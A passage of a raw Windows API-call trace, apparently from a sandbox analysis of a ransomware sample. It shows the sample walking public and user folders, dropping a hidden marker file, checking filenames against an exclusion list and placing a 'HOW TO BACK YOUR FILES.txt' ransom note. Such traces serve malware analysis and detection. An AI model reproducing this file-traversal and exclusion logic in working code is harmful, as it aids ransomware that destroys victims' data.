dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.962] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.962] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.962] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.962] CloseHandle (hObject=0x260) returned 1 [0044.962] CloseHandle (hObject=0x2ac) returned 1 [0044.963] GetCurrentThreadId () returned 0xfa8 [0044.963] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664c8 [0044.963] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public\\Desktop", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0044.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc678a8 | out: hHeap=0xc50000) returned 1 [0044.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664c0 | out: hHeap=0xc50000) returned 1 [0044.963] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0044.963] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0044.963] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Desktop\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Desktop\\.BFC0E91B00AE8A0620D3" [0044.963] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\desktop\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.965] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.968] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.969] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.969] CloseHandle (hObject=0x2ac) returned 1 [0044.969] lstrlenW (lpString="C:\\Users\\Public\\Desktop") returned 23 [0044.969] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.969] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x7fd2f7e2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0044.970] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.970] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.970] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.970] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.970] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x7fd2f7e2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.970] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.970] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.970] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.970] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.970] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.970] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fd2f7e2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fd2f7e2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fd2f7e2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.970] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.970] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.970] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38bb5c78, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x38bb5c78, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x852, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat Reader DC.lnk", cAlternateFileName="ACROBA~1.LNK")) returned 1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="Tiger4444.exe") returned -1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2=".") returned 1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="..") returned 1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="windows") returned -1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="bootmgr") returned -1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="pagefile.sys") returned -1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="boot") returned -1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="ids.txt") returned -1 [0044.970] lstrcmpiW (lpString1="Acrobat Reader DC.lnk", lpString2="NTUSER.DAT") returned -1 [0044.970] lstrcpyW (in: lpString1=0x30aead8, lpString2="Acrobat Reader DC.lnk" | out: lpString1="Acrobat Reader DC.lnk") returned="Acrobat Reader DC.lnk" [0044.970] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk", dwFileAttributes=0x0) returned 1 [0044.971] lstrlenW (lpString="Acrobat Reader DC.lnk") returned 21 [0044.971] lstrlenW (lpString="Tiger4444") returned 9 [0044.971] lstrcmpiW (lpString1="er DC.lnk", lpString2="Tiger4444") returned -1 [0044.971] lstrlenW (lpString=".dll") returned 4 [0044.971] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0044.971] lstrlenW (lpString=".lnk") returned 4 [0044.971] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0044.971] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.971] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.971] lstrcpyW (in: lpString1=0x30aead8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.971] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.971] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.971] lstrlenW (lpString="desktop.ini") returned 11 [0044.972] lstrlenW (lpString="Tiger4444") returned 9 [0044.972] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.972] lstrlenW (lpString=".dll") returned 4 [0044.972] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.972] lstrlenW (lpString=".lnk") returned 4 [0044.972] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.972] lstrlenW (lpString=".ini") returned 4 [0044.972] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.972] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x91a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Tiger4444.exe") returned -1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="windows") returned -1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootmgr") returned 1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="pagefile.sys") returned -1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot") returned 1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ids.txt") returned -1 [0044.972] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="NTUSER.DAT") returned -1 [0044.972] lstrcpyW (in: lpString1=0x30aead8, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0044.972] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk", dwFileAttributes=0x0) returned 1 [0044.972] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0044.972] lstrlenW (lpString="Tiger4444") returned 9 [0044.972] lstrcmpiW (lpString1="hrome.lnk", lpString2="Tiger4444") returned -1 [0044.972] lstrlenW (lpString=".dll") returned 4 [0044.972] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0044.972] lstrlenW (lpString=".lnk") returned 4 [0044.973] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0044.973] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Tiger4444.exe") returned -1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="windows") returned -1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="bootmgr") returned 1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="pagefile.sys") returned -1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="boot") returned 1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ids.txt") returned 1 [0044.973] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="NTUSER.DAT") returned -1 [0044.973] lstrcpyW (in: lpString1=0x30aead8, lpString2="Mozilla Firefox.lnk" | out: lpString1="Mozilla Firefox.lnk") returned="Mozilla Firefox.lnk" [0044.973] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", dwFileAttributes=0x0) returned 1 [0044.976] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0044.976] lstrlenW (lpString="Tiger4444") returned 9 [0044.976] lstrcmpiW (lpString1="refox.lnk", lpString2="Tiger4444") returned -1 [0044.976] lstrlenW (lpString=".dll") returned 4 [0044.976] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0044.976] lstrlenW (lpString=".lnk") returned 4 [0044.976] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0044.976] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0044.976] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0044.977] lstrcpyW (in: lpString1=0x30aead8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.977] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\desktop\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.977] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.977] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.978] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.978] CloseHandle (hObject=0x260) returned 1 [0044.978] CloseHandle (hObject=0x2ac) returned 1 [0044.978] GetCurrentThreadId () returned 0xfa8 [0044.978] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66448 [0044.979] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public\\AccountPictures", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0044.979] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc828e0 | out: hHeap=0xc50000) returned 1 [0044.979] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0044.979] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\AccountPictures" | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0044.979] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\AccountPictures\\") returned="C:\\Users\\Public\\AccountPictures\\" [0044.979] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\AccountPictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\AccountPictures\\.BFC0E91B00AE8A0620D3" [0044.979] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\accountpictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.990] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.993] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.994] SetFileAttributesW (lpFileName="C:\\Users\\Public\\AccountPictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.994] CloseHandle (hObject=0x2ac) returned 1 [0044.995] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures") returned 31 [0044.995] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.995] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7fd2f7e2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0044.995] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.995] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.995] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.995] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.995] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7fd2f7e2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.995] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.995] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.996] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.996] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.996] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.996] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fd2f7e2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fd2f7e2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fd55b07, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.996] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.996] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.996] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.996] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.996] lstrcpyW (in: lpString1=0x30aeae8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.996] SetFileAttributesW (lpFileName="C:\\Users\\Public\\AccountPictures\\desktop.ini", dwFileAttributes=0x2) returned 1 [0044.996] lstrlenW (lpString="desktop.ini") returned 11 [0044.996] lstrlenW (lpString="Tiger4444") returned 9 [0044.997] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.997] lstrlenW (lpString=".dll") returned 4 [0044.997] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.997] lstrlenW (lpString=".lnk") returned 4 [0044.997] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.997] lstrlenW (lpString=".ini") returned 4 [0044.997] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.997] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0044.997] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0044.997] lstrcpyW (in: lpString1=0x30aeae8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.997] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\accountpictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.998] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.998] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.999] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.999] CloseHandle (hObject=0x260) returned 1 [0044.999] CloseHandle (hObject=0x2ac) returned 1 [0045.000] GetCurrentThreadId () returned 0xfa8 [0045.000] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666a8 [0045.000] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0045.000] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6f448 | out: hHeap=0xc50000) returned 1 [0045.000] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666a0 | out: hHeap=0xc50000) returned 1 [0045.000] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy" | out: lpString1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0045.000] lstrcatW (in: lpString1="C:\\Users\\FD1HVy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0045.000] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\.BFC0E91B00AE8A0620D3" [0045.000] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.001] WriteFile (in: hFile=0x2ac, 